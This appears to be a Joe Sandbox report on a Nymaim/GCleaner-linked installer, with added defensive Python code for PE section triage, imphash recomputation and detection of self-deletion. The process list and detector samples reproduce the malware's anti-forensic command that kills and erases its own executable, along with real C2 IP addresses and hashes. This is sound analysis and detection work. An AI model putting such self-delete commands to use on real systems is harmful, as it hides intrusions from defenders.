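    for s in parse_sections(pe):
        flags = []
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            flags.append("writable and executable")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            flags.append("no raw data, allocated at load time")
        if s["entropy"] >= 7.0:
            flags.append("high entropy, likely packed or encrypted")
        out[s["name"]] = flags
    return out


def build_sample_pe() -> bytes:
    """Constructed sample: a minimal PE32 with four sections (not the real file)."""
    spec = [  # name, VirtualAddress, VirtualSize, raw bytes, Characteristics
        (b"CODE", 0x1000, 0x933C, bytes(range(256)) * 4,
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b"DATA", 0xB000, 0x24C, b"\0" * 0x400,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b"BSS", 0xC000, 0xE4C, b"",
         IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b".rwx", 0xD000, 0x200, bytes(range(256)) * 2,
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    opt_size = 0xE0                                  # PE32 optional header size
    headers_len = 0x40 + 4 + 20 + opt_size + 40 * len(spec)
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF         # FileAlignment 0x200
    section_headers, payload = b"", b""
    for name, vaddr, vsize, raw, chars in spec:
        ptr = raw_ptr + len(payload) if raw else 0
        section_headers += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr,
                                       len(raw), ptr, 0, 0, 0, 0, chars)
        payload += raw
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x14C, len(spec), 0, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic
    image = dos + b"PE\0\0" + file_header + optional + section_headers
    return image + b"\0" * (raw_ptr - len(image)) + payload


if __name__ == "__main__":
    flags = triage(build_sample_pe())
    for sec in parse_sections(build_sample_pe()):
        print(f'{sec["name"]:<8} va=0x{sec["virtual_address"]:x} vsize=0x{sec["virtual_size"]:x} '
              f'raw=0x{sec["raw_size"]:x} entropy={sec["entropy"]:.2f} flags={flags[sec["name"]]}')
```

              Entropy is computed over the raw bytes on disk, so a section with raw size 0 always scores 0.0 exactly as in the table above; what the loader later writes into BSS, or what the "overwrites its own PE header" behaviour puts into CODE, is only visible in a memory dump, which is why the Yara hits in the process list are on .sdmp memory regions rather than on the file.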
              Name | RVA | Size | Type | Language | Country
              RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands
              RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands
              RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands
              RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands
              RT_STRING | 0x12574 | 0x2f2 | data | |
              RT_STRING | 0x12868 | 0x30c | data | |
              RT_STRING | 0x12b74 | 0x2ce | data | |
              RT_STRING | 0x12e44 | 0x68 | data | |
              RT_STRING | 0x12eac | 0xb4 | data | |
              RT_STRING | 0x12f60 | 0xae | data | |
              RT_RCDATA | 0x13010 | 0x2c | data | |
              RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States
              RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States
              RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
              DLL | Import
              kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
              user32.dll | MessageBoxA
              oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
              advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
              kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
              user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
              comctl32.dll | InitCommonControls
              advapi32.dll | AdjustTokenPrivileges
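              The Import Hash field higher up is derived from exactly this kind of DLL/function listing. The example below is added for this page and is not code from the Joe Sandbox report; it recomputes an imphash from an import list using the normalisation pefile's get_imphash() applies (lower-cased DLL name with a .dll/.ocx/.sys extension dropped, lower-cased function name or "ord<N>" for ordinal imports, entries joined with commas in import-table order, MD5 of the result). One simplification is assumed: pefile maps known ordinals of oleaut32/ws2_32/wsock32 to names before hashing, this version does not. REPORT_IMPORTS is the first import set from the table above, transcribed in the order shown.

```python
"""Added example (not code from the Joe Sandbox report): recompute an import
hash (imphash) from a DLL/function list the way pefile's get_imphash() does,
minus its ordinal-to-name mapping for oleaut32/ws2_32/wsock32 (assumed
simplification). REPORT_IMPORTS is the first import set listed above.
"""
from __future__ import annotations

import hashlib

REPORT_IMPORTS: list[tuple[str, str | int]] = [
    ("kernel32.dll", f) for f in (
        "DeleteCriticalSection", "LeaveCriticalSection", "EnterCriticalSection",
        "InitializeCriticalSection", "VirtualFree", "VirtualAlloc", "LocalFree",
        "LocalAlloc", "WideCharToMultiByte", "TlsSetValue", "TlsGetValue",
        "MultiByteToWideChar", "GetModuleHandleA", "GetLastError", "GetCommandLineA",
        "WriteFile", "SetFilePointer", "SetEndOfFile", "RtlUnwind", "ReadFile",
        "RaiseException", "GetStdHandle", "GetFileSize", "GetSystemTime",
        "GetFileType", "ExitProcess", "CreateFileA", "CloseHandle")
] + [("user32.dll", "MessageBoxA")] + [
    ("oleaut32.dll", f) for f in (
        "VariantChangeTypeEx", "VariantCopyInd", "VariantClear", "SysStringLen",
        "SysAllocStringLen")
] + [
    ("advapi32.dll", f) for f in (
        "RegQueryValueExA", "RegOpenKeyExA", "RegCloseKey", "OpenProcessToken",
        "LookupPrivilegeValueA")
]


def canonical_string(imports) -> str:
    """The exact string that gets hashed: 'dll.func,dll.func,...' in table order."""
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):     # extension is dropped, others kept
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{lib}.{name}")
    return ",".join(parts)


def imphash(imports) -> str:
    """Hex MD5 of the canonical string; order of imports matters, case does not."""
    return hashlib.md5(canonical_string(imports).encode("ascii")).hexdigest()


def report_imphash() -> str:
    return imphash(REPORT_IMPORTS)


if __name__ == "__main__":
    print(canonical_string(REPORT_IMPORTS))
    print("imphash:", report_imphash())
```

              Two points when comparing the result with the Import Hash field: the report lists two import sets, so recompute over each before concluding that a hash does not match; and an imphash of a Delphi/Inno Setup stub characterises the installer build, which every installer produced with the same compiler and stub shares, not the payload the installer drops.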
              Language of compilation system | Country where language is spoken
              Dutch | Netherlands
              English | United States
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              01/25/23-10:17:06.150578 | TCP | 2852925 | ETPRO TROJAN GCleaner Downloader - Payload Response | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jan 25, 2023 10:17:05.936774969 CET | 49701 | 80 | 192.168.2.3 | 45.12.253.56
              Jan 25, 2023 10:17:05.963335037 CET | 80 | 49701 | 45.12.253.56 | 192.168.2.3
              Jan 25, 2023 10:17:05.963465929 CET | 49701 | 80 | 192.168.2.3 | 45.12.253.56
              Jan 25, 2023 10:17:05.963747978 CET | 49701 | 80 | 192.168.2.3 | 45.12.253.56
              Jan 25, 2023 10:17:05.989998102 CET | 80 | 49701 | 45.12.253.56 | 192.168.2.3
              Jan 25, 2023 10:17:05.996356964 CET | 80 | 49701 | 45.12.253.56 | 192.168.2.3
              Jan 25, 2023 10:17:05.996470928 CET | 49701 | 80 | 192.168.2.3 | 45.12.253.56
              Jan 25, 2023 10:17:06.035572052 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.062125921 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.062306881 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.064057112 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.090361118 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.090794086 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.090888977 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.123739958 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.150029898 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150578022 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150629044 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150657892 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.150680065 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.150760889 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150805950 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150826931 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.150862932 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.150893927 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150949001 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.150964022 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.151006937 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.151025057 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.151068926 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.151088953 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.151125908 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.151149988 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.151205063 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.151218891 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.151254892 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.177668095 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.177733898 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.177781105 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.177809954 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.177809954 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.177839994 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.177886009 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.177938938 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.177953005 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.177988052 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178018093 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178070068 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178083897 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178118944 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178145885 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178194046 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178240061 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178282976 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178304911 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178333998 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178368092 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178412914 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178432941 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178476095 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178497076 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178524971 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178559065 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178603888 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178648949 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178719044 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178734064 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.178778887 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178822994 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.178843021 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.179163933 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205178022 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205246925 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205295086 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205324888 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205351114 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205351114 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205401897 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205446005 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205466032 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205502033 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205529928 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205581903 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205595970 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205629110 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205657959 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205708981 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205723047 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205759048 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205785036 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205833912 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205848932 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205882072 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.205913067 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205966949 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.205981016 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.206015110 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              Jan 25, 2023 10:17:06.206042051 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.206094027 CET | 80 | 49702 | 45.12.253.72 | 192.168.2.3
              Jan 25, 2023 10:17:06.206108093 CET | 49702 | 80 | 192.168.2.3 | 45.12.253.72
              • 45.12.253.56
              • 45.12.253.72
              • 45.12.253.75

              Target ID:0
              Start time:10:16:59
              Start date:25/01/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x400000
              File size:1825141 bytes
              MD5 hash:209DCA1A9633807B9CF36D6447F972DA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:10:17:00
              Start date:25/01/2023
              Path:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Imagebase:0x400000
              File size:712704 bytes
              MD5 hash:D76329B30DB65F61D55B20F36B56DA26
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 2%, ReversingLabs
              Reputation:moderate

              Target ID:2
              Start time:10:17:01
              Start date:25/01/2023
              Path:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Imagebase:0x400000
              File size:1327101 bytes
              MD5 hash:04947B1020E31A5F5A6E41FD279B4E74
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              Target ID:3
              Start time:10:17:04
              Start date:25/01/2023
              Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Wow64 process (32bit):true
              Commandline:
              Imagebase:0x2f0000
              File size:73728 bytes
              MD5 hash:3FB36CB0B7172E5298D2992D42984D06
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 60%, ReversingLabs
              Reputation:high

              Target ID:13
              Start time:10:17:37
              Start date:25/01/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Imagebase:0xb0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:14
              Start time:10:17:37
              Start date:25/01/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff745070000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:15
              Start time:10:17:37
              Start date:25/01/2023
              Path:C:\Windows\SysWOW64\taskkill.exe
              Wow64 process (32bit):true
              Commandline:taskkill /im "finalrecovery.exe" /f
              Imagebase:0xe10000
              File size:74752 bytes
              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
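              The last three processes are one action: finalrecovery.exe (target ID 2, the process carrying the Nymaim Yara hits) spawns cmd.exe to kill itself with taskkill and erase its own image, leaving only the dropped wEQg8.exe behind. That chain is easy to detect from process-creation telemetry alone. The example below is added for this page and is not part of the Joe Sandbox report; it parses the "taskkill ... /im" and "erase/del" segments of a cmd.exe command line and alerts only when both name the parent process's own image. The event records are constructed in the shape of process-creation telemetry; the field names (image, parent_image, command_line) are an assumption, not a particular product's schema. Only the first record reproduces a command line from the process list above, the others are invented negatives and one variant spelling.

```python
"""Added example (not part of the Joe Sandbox report): flag a process that
spawns cmd.exe to kill and erase its own executable, as finalrecovery.exe does
above. Field names are an assumed, generic process-creation schema; only the
first SAMPLE_EVENTS record is taken from the report, the rest are constructed.
"""
from __future__ import annotations

import re

# "taskkill ... /im <name>" inside one command segment (does not cross & or |)
TASKKILL_RE = re.compile(r'taskkill\b[^&|]*?/im\s+"?([^"\s&|]+)"?', re.I)
# "erase <path>" or "del <path>" up to the next & or | or end of line
ERASE_RE = re.compile(r'\b(?:erase|del)\s+"?([^"&|]+?)"?\s*(?:&|\||$)', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, with surrounding quotes removed."""
    return re.split(r"[\\/]", path.strip().strip('"'))[-1].lower()


def is_self_delete(event: dict) -> bool:
    """True when cmd.exe is told to kill and delete exactly its parent's image."""
    if basename(event["image"]) != "cmd.exe":
        return False
    cmd = event["command_line"]
    kill = TASKKILL_RE.search(cmd)
    wipe = ERASE_RE.search(cmd)
    if not kill or not wipe:
        return False
    parent = basename(event["parent_image"])
    return basename(kill.group(1)) == parent and basename(wipe.group(1)) == parent


def scan(events: list[dict]) -> list[dict]:
    """Return the events that match, in input order."""
    return [e for e in events if is_self_delete(e)]


SAMPLE_EVENTS = [
    {   # target ID 13 from the process list above (parent: target ID 2)
        "pid": 13, "parent_pid": 2,
        "image": r"C:\Windows\SysWOW64\cmd.exe",
        "parent_image": r"C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe",
        "command_line": r'"C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit',
    },
    {   # constructed negative: an installer deleting a log file, not itself
        "pid": 21, "parent_pid": 20,
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Users\user\AppData\Local\Temp\setup.exe",
        "command_line": r'cmd.exe /c del "C:\Users\user\AppData\Local\Temp\log.txt"',
    },
    {   # constructed negative: kills another process, deletes nothing
        "pid": 31, "parent_pid": 30,
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'cmd /c taskkill /im "notepad.exe" /f',
    },
    {   # constructed positive: same pattern, "del", unquoted, no spaces around &
        "pid": 41, "parent_pid": 40,
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Users\user\AppData\Roaming\svc\updater.exe",
        "command_line": r'cmd /c taskkill /f /im updater.exe&del C:\Users\user\AppData\Roaming\svc\updater.exe&exit',
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f'pid {hit["pid"]}: {basename(hit["parent_image"])} removed itself via cmd.exe')
```

              Requiring both the taskkill target and the erase target to equal the parent image keeps installers that clean up temporary files out of the alert; the cost is that a variant which waits with "ping -n" or "timeout" instead of taskkill before deleting its parent is missed, and a looser rule matching only erase/del of the parent image path should run beside this one.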

              No disassembly